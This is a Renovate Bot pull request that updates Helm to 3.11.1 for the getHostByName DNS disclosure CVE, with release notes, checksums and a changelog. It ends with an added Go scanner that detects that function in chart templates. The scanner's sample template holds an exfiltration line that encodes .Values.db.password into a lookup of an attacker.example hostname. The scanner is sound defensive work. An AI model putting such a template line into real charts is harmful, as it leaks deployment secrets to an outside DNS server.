stackabletech / stackablectl

Commandline tool to interact with a Stackable Data Platform

chore(deps): update module helm.sh/helm/v3 to v3.11.1 [security] #296

Open stackable-bot opened 7 months ago

stackable-bot commented 7 months ago

This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| helm.sh/helm/v3 | require | minor | `v3.10.3` -> `v3.11.1` |

GitHub Vulnerability Alerts

CVE-2023-25165

A Helm contributor discovered an information disclosure vulnerability using the getHostByName template function.

Impact

getHostByName is a Helm template function introduced in Helm v3. The function is able to accept a hostname and return an IP address for that hostname. To get the IP address the function performs a DNS lookup. The DNS lookup happens when used with helm install|upgrade|template or when the Helm SDK is used to render a chart.

Information passed into the chart can be disclosed to the DNS servers used to look up the IP address. For example, a malicious chart could inject getHostByName into a template in order to disclose values to a malicious DNS server.

Patches

The issue has been fixed in Helm 3.11.1.

Workarounds

Prior to using a chart with Helm verify the getHostByName function is not being used in a template to disclose any information you do not want passed to DNS servers.

For more information

Helm's security policy is spelled out in detail in our SECURITY document.

Credits

Disclosed by Philipp Stehle at SAP.


Release Notes

helm/helm (helm.sh/helm/v3)

### [`v3.11.1`](https://togithub.com/helm/helm/releases/tag/v3.11.1): Helm v3.11.1

[Compare Source](https://togithub.com/helm/helm/compare/v3.11.0...v3.11.1)

Helm v3.11.1 is a security (patch) release. Users are strongly recommended to update to this release.

The template function `getHostByName` can be used to disclose information. More details are available in the [CVE](https://togithub.com/helm/helm/security/advisories/GHSA-pwcw-6f5g-gxf8).

This release introduces a breaking change to Helm:

- When using the `helm` client for the `template`, `install`, and `upgrade` commands there is a new flag. `--enable-dns` needs to be set for the `getHostByName` template function to attempt to look up an IP address for a given hostname. If the flag is not set, the template function will return an empty string and skip looking up an IP address for the host.
- The Helm SDK has added the `EnableDNS` property to the install action, the upgrade action, and the `Engine`. This property must be set to true in order for the `getHostByName` template function to attempt to look up an IP address. The default for both of these cases is false.

[Philipp Stehle](https://togithub.com/phil9909) at SAP disclosed the vulnerability to the Helm project.

#### Installation and Upgrading

Download Helm v3.11.1. The common platform binaries are here:

- [MacOS amd64](https://get.helm.sh/helm-v3.11.1-darwin-amd64.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.1-darwin-amd64.tar.gz.sha256sum) / 2548a90e5cc957ccc5016b47060665a9d2cd4d5b4d61dcc32f5de3144d103826)
- [MacOS arm64](https://get.helm.sh/helm-v3.11.1-darwin-arm64.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.1-darwin-arm64.tar.gz.sha256sum) / 43d0198a7a2ea2639caafa81bb0596c97bee2d4e40df50b36202343eb4d5c46b)
- [Linux amd64](https://get.helm.sh/helm-v3.11.1-linux-amd64.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.1-linux-amd64.tar.gz.sha256sum) / 0b1be96b66fab4770526f136f5f1a385a47c41923d33aab0dcb500e0f6c1bf7c)
- [Linux arm](https://get.helm.sh/helm-v3.11.1-linux-arm.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.1-linux-arm.tar.gz.sha256sum) / 77b797134ea9a121f2ede9d159a43a8b3895a9ff92cc24b71b77fb726d9eba6d)
- [Linux arm64](https://get.helm.sh/helm-v3.11.1-linux-arm64.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.1-linux-arm64.tar.gz.sha256sum) / 919173e8fb7a3b54d76af9feb92e49e86d5a80c5185020bae8c393fa0f0de1e8)
- [Linux i386](https://get.helm.sh/helm-v3.11.1-linux-386.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.1-linux-386.tar.gz.sha256sum) / 1581a4ce9d0014c49a3b2c6421f048d5c600e8cceced636eb4559073c335af0b)
- [Linux ppc64le](https://get.helm.sh/helm-v3.11.1-linux-ppc64le.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.1-linux-ppc64le.tar.gz.sha256sum) / 6ab8f2e253c115b17eda1e10e96d1637047efd315e9807bcb1d0d0bcad278ab7)
- [Linux s390x](https://get.helm.sh/helm-v3.11.1-linux-s390x.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.1-linux-s390x.tar.gz.sha256sum) / ab133e6b709c8107dc4f8f62838947350adb8e23d76b8c2c592ff4c09bc956ef)
- [Windows amd64](https://get.helm.sh/helm-v3.11.1-windows-amd64.zip) ([checksum](https://get.helm.sh/helm-v3.11.1-windows-amd64.zip.sha256sum) / bc37d5d283e57c5dfa94f92ff704c8e273599ff8df3f8132cef5ca73f6a23d0a)

This release was signed with `672C 657B E06B 4B30 969C 4A57 4614 49C2 5E36 B98E` and can be found at [@mattfarina](https://togithub.com/mattfarina)'s [keybase account](https://keybase.io/mattfarina). Please use the attached signatures for verifying this release using `gpg`.

The [Quickstart Guide](https://helm.sh/docs/intro/quickstart/) will get you going from there. For **upgrade instructions** or detailed installation notes, check the [install guide](https://helm.sh/docs/intro/install/). You can also use a [script to install](https://raw.githubusercontent.com/helm/helm/main/scripts/get-helm-3) on any system with `bash`.

#### What's Next

- 3.11.2 is the next patch/bug fix release and will be on March 08, 2023.
- 3.12.0 is the next feature release and will be on May 10, 2023.

### [`v3.11.0`](https://togithub.com/helm/helm/releases/tag/v3.11.0): Helm v3.11.0

[Compare Source](https://togithub.com/helm/helm/compare/v3.10.3...v3.11.0)

Helm v3.11.0 is a feature release. Users are encouraged to upgrade for the best experience.

The community keeps growing, and we'd love to see you there!

- Join the discussion in [Kubernetes Slack](https://kubernetes.slack.com):
  - for questions and just to hang out
  - for discussing PRs, code, and bugs
- Hang out at the Public Developer Call: Thursday, 9:30 Pacific via [Zoom](https://zoom.us/j/696660622)
- Test, debug, and contribute charts: [ArtifactHub/packages](https://artifacthub.io/packages/search?kind=0)

#### Notable Changes

- The Helm status command and the SDK can now show the status of core resources deployed in a chart (e.g., deployments). To use this with `helm status` you need to pass the `--show-resources` flag.
- Add support for comma separated values in template --api-versions
- Allow CGO_ENABLED to be overridden when building Helm from source

#### Installation and Upgrading

Download Helm v3.11.0. The common platform binaries are here:

- [MacOS amd64](https://get.helm.sh/helm-v3.11.0-darwin-amd64.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.0-darwin-amd64.tar.gz.sha256sum) / 5a3d13545a302eb2623236353ccd3eaa01150c869f4d7f7a635073847fd7d932)
- [MacOS arm64](https://get.helm.sh/helm-v3.11.0-darwin-arm64.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.0-darwin-arm64.tar.gz.sha256sum) / f4717f8d1dab79bace3ff5d9d48bebef62310421fd479205ef54a56204f97415)
- [Linux amd64](https://get.helm.sh/helm-v3.11.0-linux-amd64.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.0-linux-amd64.tar.gz.sha256sum) / 6c3440d829a56071a4386dd3ce6254eab113bc9b1fe924a6ee99f7ff869b9e0b)
- [Linux arm](https://get.helm.sh/helm-v3.11.0-linux-arm.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.0-linux-arm.tar.gz.sha256sum) / cddbef72886c82a123038883f32b04e739cc4bd7b9e5f869740d51e50a38be01)
- [Linux arm64](https://get.helm.sh/helm-v3.11.0-linux-arm64.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.0-linux-arm64.tar.gz.sha256sum) / 57d36ff801ce8c0201ce9917c5a2d3b4da33e5d4ea154320962c7d6fb13e1f2c)
- [Linux i386](https://get.helm.sh/helm-v3.11.0-linux-386.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.0-linux-386.tar.gz.sha256sum) / fad897763f3b965bc4d75c8f95748ebc0330a5859d9ea170a4885571facacdb1)
- [Linux ppc64le](https://get.helm.sh/helm-v3.11.0-linux-ppc64le.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.0-linux-ppc64le.tar.gz.sha256sum) / 6481a51095f408773212ab53edc2ead8a70e39eba67c2491e11c4229a251f9b5)
- [Linux s390x](https://get.helm.sh/helm-v3.11.0-linux-s390x.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.0-linux-s390x.tar.gz.sha256sum) / 3c420f13d12ca9e7302715d40a00466a145a2dff7f14714e11a5aeadb1d67919)
- [Windows amd64](https://get.helm.sh/helm-v3.11.0-windows-amd64.zip) ([checksum](https://get.helm.sh/helm-v3.11.0-windows-amd64.zip.sha256sum) / 55477fa4295fb3043835397a19e99a138bb4859fbe7cd2d099de28df9d8786f1)

This release was signed with `F126 1BDE 9290 12C8 FF2E 501D 6EA5 D759 8529 A53E` and can be found at [@hickeyma](https://togithub.com/hickeyma)'s [keybase account](https://keybase.io/hickeyma). Please use the attached signatures for verifying this release using `gpg`.

The [Quickstart Guide](https://helm.sh/docs/intro/quickstart/) will get you going from there. For **upgrade instructions** or detailed installation notes, check the [install guide](https://helm.sh/docs/intro/install/). You can also use a [script to install](https://raw.githubusercontent.com/helm/helm/main/scripts/get-helm-3) on any system with `bash`.

#### What's Next

- 3.11.1 is the next patch/bug fix release and will be on February 08, 2023.
- 3.12.0 is the next feature release and will be on May 10, 2023.

#### Changelog

- Fix improper use of Table request/response to k8s API [`472c573`](https://togithub.com/helm/helm/commit/472c5736ab01133de504a826bd9ee12cbe4e7904) (Matt Farina)
- Check status code before retrying request [`ee1ec6e`](https://togithub.com/helm/helm/commit/ee1ec6e432fe3b1943a291e59990becb5fe046ae) (Cenk Alti)
- bump version to v3.11.0 [`9d8fee1`](https://togithub.com/helm/helm/commit/9d8fee155bd7e7d3c1390f4076d9271a1147dce5) (Matt Farina)
- Bump containerd to 1.6.15, oras-go to 1.2.2 and image-spec to v1.1.0-rc2 [`017785a`](https://togithub.com/helm/helm/commit/017785a2f1104eb4299f8d31feb550c213350f13) (Luca Comellini)
- change linting error messages for null values in arrays [`6a5f240`](https://togithub.com/helm/helm/commit/6a5f240e9a22cf5ef3a889764079873a9cd537a4) (Daniel Strobusch)
- Fix after CR [`3d81ea2`](https://togithub.com/helm/helm/commit/3d81ea22ac74e667b98a26eb80a5d427d75f7009) (Jakub Warczarek)
- Trigger CI [`f46ff13`](https://togithub.com/helm/helm/commit/f46ff131c2ca169d25f9b8f8d550f6c320b48048) (Jakub Warczarek)
- Add test for User-Agent header setting and refactor [`553f1e3`](https://togithub.com/helm/helm/commit/553f1e34f54ce4c75ee10b53c441063d6303db3c) (Jakub Warczarek)
- Fix User-Agent header in requests made by Helm [`2fa7b3d`](https://togithub.com/helm/helm/commit/2fa7b3d1b7a289690ccc2c820b3329c6b07a1458) (Jakub Warczarek)
- Bump k8s.io deps to v0.26.0 [`1fc2a6a`](https://togithub.com/helm/helm/commit/1fc2a6a39ccedd9d11c9839853a95d28ca35294f) (Luca Comellini)
- fix adopted resource not replaced [`3181c7d`](https://togithub.com/helm/helm/commit/3181c7ddadd2271d67a457522abc13410929b64c) (Vaibhav Sharma)
- chore(deps): bump github.com/BurntSushi/toml from 1.2.0 to 1.2.1 [`8774890`](https://togithub.com/helm/helm/commit/8774890e7edadbab88f35e6536393cf791b183f0) (dependabot\[bot])
- Resolve conflicts for go.mod and go.sum [`6c76abb`](https://togithub.com/helm/helm/commit/6c76abb3df72df415dd54b9a09ce26fcee8fad95) (Soujanya Mangipudi)
- Fix backwards compatibility [`b6fef6c`](https://togithub.com/helm/helm/commit/b6fef6c4665130644acf7742040ebd46f9cc957c) (Martin Hickey)
- docs: add docs for cli/values.Options [`0fdfe05`](https://togithub.com/helm/helm/commit/0fdfe0584437112e11fdfa6775625451442f6c91) (Zuhair AlSader)
- Update chartrepo.go [`c8890e9`](https://togithub.com/helm/helm/commit/c8890e971e50a305dc8a83029fa882ee255007b2) (caixisheng)
- chore(deps): bump golang.org/x/text from 0.4.0 to 0.5.0 [`b307d0f`](https://togithub.com/helm/helm/commit/b307d0fbeb42fe890450d8d3de2291817ad9b4cb) (dependabot\[bot])
- bump sprig version 3.2.3 [`fda1a0b`](https://togithub.com/helm/helm/commit/fda1a0b10a87845b3cbe58434089f0def4220f53) (yxxhero)
- Update string handling [`a59e584`](https://togithub.com/helm/helm/commit/a59e58468430bf9b454426ff22f5f367185b7d77) (Martin Hickey)
- Update repo handling [`256e976`](https://togithub.com/helm/helm/commit/256e976331db4b7335ef721e411e7b59c5317ccb) (Martin Hickey)
- improve error message on plugin install [`965f859`](https://togithub.com/helm/helm/commit/965f8591e7eab685186626bf7e64b4c24b384c39) (Philipp Stehle)
- harmonize URL reference resolving [`dfb25e1`](https://togithub.com/helm/helm/commit/dfb25e13deba70eafe607748cd83bdda5409d245) (Philipp Stehle)
- Update logic of non-git situation just to print warning logs [`0ebd620`](https://togithub.com/helm/helm/commit/0ebd6202d8fb1fb334a7670896d6a97cc736688c) (Wonyeong Choi)
- Add a flag var to check git is installed or not [`c027014`](https://togithub.com/helm/helm/commit/c0270140197f459979ff21a618729afb844a854a) (Wonyeong Choi)
- Add support for CSVs in template --api-versions arg [`5aa316e`](https://togithub.com/helm/helm/commit/5aa316e1eec883878262a01f36a7fcf6ffd7f641) (Ryan Drew)
- update .golangci for go1.18 [`61374f6`](https://togithub.com/helm/helm/commit/61374f655467485673dd87a8c0cbe871d4f28175) (yanggang)
- redirect registry client output to stderr [`1535ad5`](https://togithub.com/helm/helm/commit/1535ad56716d21a8b5fc93354a9ac91ba9d696ab) (Cyril Jouve)
- chore(deps): bump github.com/spf13/cobra from 1.5.0 to 1.6.1 [`b3afe43`](https://togithub.com/helm/helm/commit/b3afe432784baf5300b876b9d03456d256f93574) (dependabot\[bot])
- Readiness & liveness probes correct port [`9d027ea`](https://togithub.com/helm/helm/commit/9d027eaac894e1793c663448cfd494bcc21c759f) (Peter Leong)
- Update schema validation handling [`775af2a`](https://togithub.com/helm/helm/commit/775af2a0ceadef1bc8f627cdb70fadb3c69b8d86) (Martin Hickey)
- fix a few function names on comments [`09d3f31`](https://togithub.com/helm/helm/commit/09d3f31358882970d02018bd84bcbcd28b47f986) (cui fliter)
- use intstr.GetScaledValueFromIntOrPercent instead of the deprecated [`9d59d92`](https://togithub.com/helm/helm/commit/9d59d92abb462d6f59b77ee1099b18067e561932) (Qifan Shen)
- Updating the deb location for azure cli [`70a3df4`](https://togithub.com/helm/helm/commit/70a3df49d702e23ad29367783a5655350be90265) (Matt Farina)
- retry http request on temporary errors [`b5378b3`](https://togithub.com/helm/helm/commit/b5378b3a5dd435e5c364ac0cfa717112ad686bd0) (Cenk Alti)
- Revert "Tolerate temporary errors from etcdserver" [`d32c623`](https://togithub.com/helm/helm/commit/d32c623699de24ac49653a6ec561485ce122d530) (Cenk Alti)
- Updating the repo the azure cli is installed from [`9fbf1b3`](https://togithub.com/helm/helm/commit/9fbf1b34d5aa34c5774b56247ddd9ae96145f767) (Matt Farina)
- Updating to kubernetes 1.25.2 packages [`221b0f5`](https://togithub.com/helm/helm/commit/221b0f54c912ce5d9dbb5eb5b10b62f411e2589b) (Matt Farina)
- Allow CGO_ENABLED to be overridden for build [`6f6c0d8`](https://togithub.com/helm/helm/commit/6f6c0d831d69a133c4100a79838c57bcb4d551d4) (Joe Julian)
- chore(deps): bump github.com/sirupsen/logrus from 1.8.1 to 1.9.0 [`98077dd`](https://togithub.com/helm/helm/commit/98077dd340ebcbf8c2271b5fd8f8c831dea82a88) (dependabot\[bot])
- chore(deps): bump github.com/lib/pq from 1.10.6 to 1.10.7 [`bfd1890`](https://togithub.com/helm/helm/commit/bfd189000e95ff67e226dc434bdcecc2a5a3351d) (dependabot\[bot])
- chore(deps): bump github.com/BurntSushi/toml from 1.1.0 to 1.2.0 [`1478a09`](https://togithub.com/helm/helm/commit/1478a098f1619fd5d3372252f2e1caf3a260a50d) (dependabot\[bot])
- chore(deps): bump github.com/rubenv/sql-migrate from 1.1.2 to 1.2.0 [`4376d2f`](https://togithub.com/helm/helm/commit/4376d2fa85a6be10d12dc2b6e6d5377b6e675b78) (dependabot\[bot])
- Tolerate temporary errors from etcdserver [`ebc79fa`](https://togithub.com/helm/helm/commit/ebc79fa807f29b984e090f0071b640f7347937cf) (Davanum Srinivas)
- update: Optimize the error message [`4fcec24`](https://togithub.com/helm/helm/commit/4fcec24d15c616011fb2d7c22c3dd0024bb9e41b) (wujunwei)
- add nil judge for dependency, maintainers validate and some testcase. [`a7a1117`](https://togithub.com/helm/helm/commit/a7a11173271e5721078994647caf856489dfd929) (wujunwei)
- Fix code style [`ae828ce`](https://togithub.com/helm/helm/commit/ae828ce0ee0f0ad48482cc9fd773c28b137dd23d) (Martin Hickey)
- bump version to v3.10.0 [`cd809f9`](https://togithub.com/helm/helm/commit/cd809f9b1953a180de6f532c0ad19c625afa7ced) (Matt Farina)
- Addressing review comments - move printing code out of client.go [`ffa19a4`](https://togithub.com/helm/helm/commit/ffa19a4b5d836283a91a4c16f8b81e734a973afc) (Soujanya Mangipudi)
- Addressing review comments: Extend Interface with new InterfaceResources to avoid breaking changes. Move change to status command behind --show-resources flag [`20e3577`](https://togithub.com/helm/helm/commit/20e35775439c699bdd5c8fdc228ebe57a4b9c002) (Soujanya Mangipudi)
- feat(helm): Supporting helm3 to show up resource names that were deployed as part of release in helm status command [`9d5be80`](https://togithub.com/helm/helm/commit/9d5be803bc0d408944f6b30c98a05c4026abc6e2) (Soujanya Mangipudi)
- During deletion, explicitly log already deleted resource name. [`b7c35d2`](https://togithub.com/helm/helm/commit/b7c35d2a0f2ba8920cbae41dab5b054ac6e61c53) (Marcin Owsiany)
- fix: add cases.NoLower option for we can get same effect to strings.Title [`f0037e5`](https://togithub.com/helm/helm/commit/f0037e5ef6bb118dbcd6e26497014b97436888d6) (wujunwei)
- one defer [`3b19dde`](https://togithub.com/helm/helm/commit/3b19ddeb56fae17a1d176130702ae5b779b20460) (CI)
- don't change r.CachePath [`781ddba`](https://togithub.com/helm/helm/commit/781ddba690afa20c80f443a121c3134f668dc43a) (CI)
- avoid adding new public function [`cd76fcd`](https://togithub.com/helm/helm/commit/cd76fcd80557490d2f2ee1204b1bdbf78c738ec9) (CI)
- fix tests [`32a41fc`](https://togithub.com/helm/helm/commit/32a41fcfac9ca1b4f4997a6660bacba9a01a9d45) (CI)
- fix: clean up temp files in FindChartInAuthAndTLSAndPassRepoURL ([#11171](https://togithub.com/helm/helm/issues/11171)) [`24fa3d9`](https://togithub.com/helm/helm/commit/24fa3d910d774b9d7f40f1fc8002bc1fb55565ca) (CI)
- Fix URL with encoded path support for ChartDownloader [`d9e5bbc`](https://togithub.com/helm/helm/commit/d9e5bbc09d4d44660fe20df41ce3b567f0336f85) (Mathieu Parent)

Configuration

📅 Schedule: Branch creation - "" in timezone Europe/Berlin, Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.



This PR has been generated by Renovate Bot.
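The advisory's workaround asks you to verify that `getHostByName` is not used in a chart before rendering it. The program below is an added example, not part of this Renovate PR, of Helm's code base, or of stackablectl: it scans a template with Go's standard `text/template/parse` package in `SkipFuncCheck` mode (Go 1.17 or later, so Helm and Sprig functions need not be registered), finds every `getHostByName` call including ones nested in parentheses, `define` blocks or `template` pipelines, and distinguishes a literal hostname from an argument built from chart values, which is the exfiltration shape described in the advisory. The embedded sample template and its `attacker.example` hostname are constructed for the demonstration.

```go
package main

import (
	"fmt"
	"os"
	"strings"
	"text/template/parse"
)

// Finding is one getHostByName call; Constant is true only when its sole
// argument is a string literal (a derived argument can carry chart values).
type Finding struct {
	Line     int    // 1-based source line of the call
	Call     string // the command as written, e.g. getHostByName (printf ...)
	Constant bool
}

// sampleTemplate is a constructed chart template (not from any real chart)
// showing the exfiltration pattern next to a plain literal lookup.
const sampleTemplate = `apiVersion: v1
kind: ConfigMap
data:
  {{- /* encodes a chart value into a hostname that the attacker's DNS server logs */}}
  resolved: {{ getHostByName (printf "%s.attacker.example" .Values.db.password) | quote }}
  pinned: {{ getHostByName "registry.example.com" | quote }}
`

// scanTemplate parses one template in SkipFuncCheck mode (Helm and Sprig
// functions need not be registered) and reports every getHostByName call.
func scanTemplate(name, src string) ([]Finding, error) {
	trees := map[string]*parse.Tree{}
	t := parse.New(name)
	t.Mode = parse.SkipFuncCheck
	if _, err := t.Parse(src, "{{", "}}", trees); err != nil {
		return nil, err
	}
	var out []Finding
	for _, tree := range trees { // the main tree plus one per {{ define }}
		walk(tree.Root, func(cmd *parse.CommandNode) {
			if id, ok := cmd.Args[0].(*parse.IdentifierNode); !ok || id.Ident != "getHostByName" {
				return
			}
			_, lit := cmd.Args[len(cmd.Args)-1].(*parse.StringNode) // getHostByName "host"
			line := strings.Count(src[:cmd.Position()], "\n") + 1
			out = append(out, Finding{Line: line, Call: cmd.String(), Constant: lit})
		})
	}
	return out, nil
}

// walk visits every command node, descending into pipelines, branches and
// parenthesised sub-pipelines so that nested calls are not missed.
func walk(n parse.Node, fn func(*parse.CommandNode)) {
	switch n := n.(type) {
	case *parse.ListNode:
		if n != nil {
			for _, c := range n.Nodes {
				walk(c, fn)
			}
		}
	case *parse.PipeNode:
		if n != nil {
			for _, c := range n.Cmds {
				walk(c, fn)
			}
		}
	case *parse.CommandNode:
		fn(n)
		for _, a := range n.Args {
			walk(a, fn) // a PipeNode argument is a parenthesised sub-pipeline
		}
	case *parse.ActionNode:
		walk(n.Pipe, fn)
	case *parse.TemplateNode:
		walk(n.Pipe, fn)
	case *parse.IfNode:
		walkBranch(&n.BranchNode, fn)
	case *parse.RangeNode:
		walkBranch(&n.BranchNode, fn)
	case *parse.WithNode:
		walkBranch(&n.BranchNode, fn)
	}
}

func walkBranch(b *parse.BranchNode, fn func(*parse.CommandNode)) {
	walk(b.Pipe, fn)
	walk(b.List, fn)
	walk(b.ElseList, fn)
}

// main scans the constructed sample; feed real charts to scanTemplate file by file.
func main() {
	findings, err := scanTemplate("sample.yaml", sampleTemplate)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(2)
	}
	for _, f := range findings {
		fmt.Printf("sample.yaml:%d: %s  [literal argument: %v]\n", f.Line, f.Call, f.Constant)
	}
}
```

To use it as a pre-install gate, read every file under a chart's `templates/` directory and pass each one to `scanTemplate`, failing the pipeline on any finding whose `Constant` is false; a literal hostname only discloses that name to the resolver, whereas a derived one can encode `.Values` content into the query. Parsing the template rather than grepping matters because a `getHostByName` hidden inside a `define` block or a parenthesised sub-pipeline is still rendered by Helm, and on Helm 3.11.1 and later the lookup additionally stays disabled unless `--enable-dns` (or the SDK's `EnableDNS`) is set.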